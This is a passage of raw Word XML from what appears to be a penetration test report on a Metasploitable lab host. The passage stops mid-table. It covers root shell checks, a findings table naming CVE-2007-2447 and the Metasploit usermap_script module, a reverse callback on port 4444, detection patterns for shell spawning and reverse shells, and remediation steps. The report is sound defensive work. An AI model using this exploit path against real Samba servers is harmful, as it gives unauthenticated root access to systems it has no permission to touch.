          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE8E740"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7. Post-Exploitation Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFC7B0A"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Once the shell session was established, basic privilege and identity checks were performed to confirm the level of access obtained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A08DA9E"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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>root</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uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.6.24-16-server #1 SMP</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Consolas" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B7AAC7"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The output confirmed that the exploit had granted an interactive shell running as the root user — the highest privilege level on the system — with no authentication required. This constitutes a full, unauthenticated remote compromise of the target host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111F63CC" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="150" w:after="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D83D39E" wp14:editId="355A2087">
            <wp:extent cx="5676900" cy="3838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76900" cy="3838575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4431DE" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="220"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 8 – Confirmed root shell access on the target (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3A0AA8"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8. Summary of Findings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A2A16" w:rsidRPr="003A2A16" w14:paraId="30983B49" w14:textId="77777777" w:rsidTr="00201DAC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="50B7B65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Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="32DBAD6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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="45E01A9D" w14:textId="77777777" w:rsidTr="00201DAC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5B27247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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="07AE542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Samba “username map script” Command Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="7FE0B447" w14:textId="77777777" w:rsidTr="00201DAC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4169D1D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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="13A36EDC"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CVE-2007-2447</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="61DEC56E" w14:textId="77777777" w:rsidTr="00201DAC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6A70F72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lastRenderedPageBreak/>
              <w:t>Affected Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0AC5D08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Samba 3.0.20 – 3.0.25rc3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via “username map script” config option)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="039280DF" w14:textId="77777777" w:rsidTr="00201DAC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3A48F1BD"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Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1B6EC54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Network / unauthenticated (SMB, TCP 139/445)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="13005522" w14:textId="77777777" w:rsidTr="00201DAC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2666A336"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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4A900AE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Full remote command execution as root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="0DE0F1D6" w14:textId="77777777" w:rsidTr="00201DAC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0ECEB8D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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2B94FDF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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="659F764C" w14:textId="77777777" w:rsidTr="00201DAC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="09AA5C3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Exploit Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="679F4ED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exploit/multi/samba/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>usermap_script</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Metasploit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="1B9BF568" w14:textId="77777777" w:rsidTr="00201DAC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="318A41A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Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2005DA7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Root-level interactive shell obtained on target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49226442"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9. Detection and Logging Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476D0AC6"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Even where immediate patching is not possible, several detective controls would have surfaced this activity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D431CC1"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Network IDS/IPS signatures for SMB session-setup requests containing shell metacharacters (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> backticks, pipes, semicolons, parentheses) in the username field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B2F540"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Host-based auditing (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>auditd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">) on the Samba host to alert when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or its child processes spawn a shell (/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, /bin/bash) unexpectedly —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invoking a shell outside of its normal service behavior is a strong indicator of this exploit class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3677699F"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Egress filtering and outbound connection monitoring, since exploitation here relied on the target initiating a reverse TCP callback to the attacker on port 4444 — a connection a well-configured egress firewall or NIDS should flag as anomalous outbound traffic from a file server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1BDCA5"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Centralized logging of Samba authentication logs (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>log.smbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>) with alerting on repeated or malformed session-setup attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEC5E4A" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Endpoint detection and response (EDR) tooling configured to flag root-owned processes spawning network listeners or reverse shells.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEA0723"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10. Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3020A3C8"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Recommendations below are prioritized by impact and effort.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00"/>
        <w:gridCol w:w="4200"/>
        <w:gridCol w:w="3550"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="296A7DBC" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6F37EFD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Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4FFA0B0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Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="46864DF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Rationale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="14062233" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7566702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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="75EAA19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Upgrade Samba to a current, supported release (3.0.25rc4+ / modern Samba 4.x)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="454570D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Directly eliminates the vulnerable code path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="659F6491" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4A5AC64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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="17769EF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 xml:space="preserve">Disable or remove the “username map script” directive in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>smb.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> unless strictly required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3550" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3CBE250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Removes the vulnerable feature even without an upgrade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="0F6724A7" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2EE2058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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
